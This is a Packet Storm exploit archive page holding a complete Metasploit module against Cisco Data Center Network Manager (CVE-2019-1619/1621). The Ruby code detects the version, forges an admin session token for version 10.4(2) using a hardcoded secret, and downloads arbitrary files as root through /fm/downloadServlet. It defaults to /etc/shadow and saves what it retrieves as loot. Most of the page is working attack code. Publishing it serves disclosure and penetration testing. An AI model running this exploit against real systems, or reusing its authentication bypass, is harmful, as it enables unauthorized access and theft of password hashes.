exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Cisco Data Center Network Manager Unauthenticated File Download

Cisco Data Center Network Manager Unauthenticated File Download
Posted Aug 31, 2024
Authored by Pedro Ribeiro | Site metasploit.com

DCNM exposes a servlet to download files on /fm/downloadServlet. An authenticated user can abuse this servlet to download arbitrary files as root by specifying the full path of the file. This Metasploit module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit (see References to understand why).

tags | exploit, arbitrary, root
systems | linux
advisories | CVE-2019-1619, CVE-2019-1621
SHA-256 | 405b00bb4d79db5348b3c12e604b6e404da1f9cceecda00a4b54d45d591a379d

Cisco Data Center Network Manager Unauthenticated File Download

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary

include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Deprecated
moved_from 'auxiliary/admin/cisco/cisco_dcnm_download'

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Cisco Data Center Network Manager Unauthenticated File Download',
'Description' => %q{
DCNM exposes a servlet to download files on /fm/downloadServlet.
An authenticated user can abuse this servlet to download arbitrary files as root by specifying
the full path of the file.
This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should
work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
(see References to understand why).
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2019-1619' ],
[ 'CVE', '2019-1621' ],
[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass' ],
[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Cisco/cisco-dcnm-rce.txt' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2019/Jul/7' ]
],
'DisclosureDate' => '2019-06-26'
)
)

register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Connect with TLS', true]),
OptString.new('TARGETURI', [true, 'Default server path', '/']),
OptString.new('USERNAME', [true, 'Username for auth (required only for 11.0(1)', 'admin']),
OptString.new('PASSWORD', [true, 'Password for auth (required only for 11.0(1)', 'admin']),
OptString.new('FILEPATH', [false, 'Path of the file to download', '/etc/shadow']),
]
)
end

def auth_v11
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fm/'),
'method' => 'GET',
'vars_get' =>
{
'userName' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
)

if res && res.code == 200
# get the JSESSIONID cookie
if res.get_cookies
res.get_cookies.split(';').each do |cok|
if cok.include?('JSESSIONID')
return cok
end
end
end
end
end

def auth_v10
# step 1: get a JSESSIONID cookie and the server Date header
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'fm/'),
'method' => 'GET'
})

# step 2: convert the Date header and create the auth hash
if res && res.headers['Date']
jsession = res.get_cookies.split(';')[0]
date = Time.httpdate(res.headers['Date'])
server_date = date.strftime('%s').to_i * 1000
print_good("#{peer} - Got sysTime value #{server_date}")

# auth hash format:
# username + sessionId + sysTime + POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF
session_id = rand(1000..50000).to_s
md5 = Digest::MD5.digest 'admin' + session_id + server_date.to_s +
'POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF'
md5_str = Base64.strict_encode64(md5)

# step 3: authenticate our cookie as admin
# token format: sessionId.sysTime.md5_str.username
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fm', 'pmreport'),
'cookie' => jsession,
'vars_get' =>
{
'token' => "#{session_id}.#{server_date}.#{md5_str}.admin"
},
'method' => 'GET'
)

if res && res.code == 500
return jsession
end
end
end

def run
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fm', 'fmrest', 'about', 'version'),
'method' => 'GET'
)
noauth = false

if res && res.code == 200
if res.body.include?('version":"11.1(1)')
print_good("#{peer} - Detected DCNM 11.1(1)")
print_status("#{peer} - No authentication required, ready to exploit!")
noauth = true
elsif res.body.include?('version":"11.0(1)')
print_good("#{peer} - Detected DCNM 11.0(1)")
print_status("#{peer} - Note that 11.0(1) requires valid authentication credentials to exploit")
jsession = auth_v11
elsif res.body.include?('version":"10.4(2)')
print_good("#{peer} - Detected DCNM 10.4(2)")
print_status("#{peer} - No authentication required, ready to exploit!")
jsession = auth_v10
else
print_error("#{peer} - Failed to detect module version.")
print_error('Please contact module author or add the target yourself and submit a PR to the Metasploit project!')
print_error(res.body)
print_error("#{peer} - Trying unauthenticated method for DCNM 10.4(2) and below...")
jsession = auth_v10
end
end

if jsession || noauth
print_good("#{peer} - Successfully authenticated our JSESSIONID cookie")
else
fail_with(Failure::Unknown, "#{peer} - Failed to authenticate JSESSIONID cookie")
end

res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fm', 'downloadServlet'),
'method' => 'GET',
'cookie' => jsession,
'vars_get' => {
'showFile' => datastore['FILEPATH']
}
)

if res && res.code == 200 && !res.body.empty?
filedata = res.body
vprint_line(filedata.to_s)
fname = File.basename(datastore['FILEPATH'])

path = store_loot(
'cisco-DCNM.http',
'application/octet-stream',
datastore['RHOST'],
filedata,
fname
)
print_good("File saved in: #{path}")
else
fail_with(Failure::Unknown, "#{peer} - Failed to download file #{datastore['FILEPATH']}")
end
end
end
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    14 Files
  • 15
    Oct 15th
    49 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close